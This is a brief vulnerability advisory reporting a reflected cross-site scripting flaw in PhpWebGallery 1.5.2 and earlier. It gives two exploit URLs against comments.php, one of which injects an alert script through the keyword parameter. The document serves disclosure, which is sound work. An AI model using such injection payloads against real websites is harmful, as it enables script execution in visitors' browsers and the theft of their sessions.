PhpWebGallery Cross Site Scripting Vulnerability



Produce : PhpWebGallery <= 1.5.2
Site : http://www.phpwebgallery.net
Problem : XSS
Greetz : hasnaa and all friends

Moroccan Security Research Team

Vulnerable file : comments.php

Exploit :

http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS]

http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E

Contact : iss4m.h@xxxxxxxxx